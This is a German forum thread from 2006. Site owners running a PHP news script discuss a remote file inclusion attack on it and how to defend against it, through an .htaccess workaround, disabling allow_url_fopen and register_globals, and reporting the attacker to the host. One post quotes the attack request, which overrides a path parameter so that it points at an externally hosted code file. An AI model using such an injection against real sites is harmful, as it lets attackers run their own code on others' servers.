u.a. wurde bei folgendes skript über ein formularskript an meine seite geschickt:

http://www.domain.de/skriptverzeichnis/i...ONF_SYSTEM[server_path]=http://www.geocities.com/xxx/xxx.txt?


der newsletter wär auch nur sowas wie nen informationsmittel: "achtung folgendes problem ist bekannt, prüft bitte ob...". man schaut ja nicht jeden tag ins forum.

beste grüße

[edit by admin]Link entfernt[/edit]

hab geocities soeben informiert, die url sollte bald weg sein. den quellcode der .txt datei hab ich gesichert, falls ihn jemand zur auswertung braucht.

sobald geocities reagiert hat, werde ich strafanzeige gegen den inhaber erstatten.

wenn ich die .htaccess datei wie beschrieben einbaue tritt zwar das problem nicht mehr auf, aber leider wird auch der visual editor nicht mehr geladen. gibts dafür eine lösung?

gruß

Hi,

dann geht leider nur die andere Variante.
Ich werde aber im laufe der nächsten Tage eine überarbeitete Version online stellen, wo das Problem dann behoben ist.

Hallo zusammen,

die Hacker haben auch bei mir zugeschlagen. Reicht es prinzipiell wenn der Provider url_fopen deaktiviert oder sollte der Code noch geändert werden?

Gruß B.

hey Jungs
wir hatten heute über 14 000 zugriffe auf meiner willkommens Hacker Block seite  :-D

puretec hat sich doch glatt selber gemeldet  :evil:

also das funzt *daumenhoch*

Wie was hat Puretec denn gesagt?

(28.09.2006 22:11 PM)barome schrieb:  Hallo zusammen,

die Hacker haben auch bei mir zugeschlagen. Reicht es prinzipiell wenn der Provider url_fopen deaktiviert oder sollte der Code noch geändert werden?

Gruß B.

Hi,

wenn url_fopen deaktiviert ist, dann kann keine externe Datei, die den Schadcode enthält geladen werden. Und wenn die register_globals auf off stehe, dann kann die Variable erst gar nicht überschrieben werden.

(29.09.2006 06:27 AM)sbaumann schrieb:  Hi,

wenn url_fopen deaktiviert ist, dann kann keine externe Datei, die den Schadcode enthält geladen werden. Und wenn die register_globals auf off stehe, dann kann die Variable erst gar nicht überschrieben werden.

Danke für die Info, das ist für mich alles totales Neuland. Puretec/1und1 hatte mich angeschrieben und mir mitgeteilt das sie die Parameter für den Ordner in dem der Newswriter steht deaktiviert haben. Reicht das denn überhaupt wenn sie die Parameter auf dem entsprechenden Ordner deaktivieren?

Seit die daran rumgepfuscht haben bekomme ich auch eine Fehlermeldung statt des Newswriters zu sehen.

Zitat:Fatal error: Call to undefined function: newswriter() in /homepages/19/d19311943/htdocs/teamsite/index.php on line 209

Gruß B.

Na die haben komplett den Newswriter auskommentiert denke ich mal.
Du siehst anhand der phpinfo, ob die Parameter deaktiviert sind oder nicht.
Am besten du nimmst den Workaround aus dem Thread hier und dann passt alles wieder.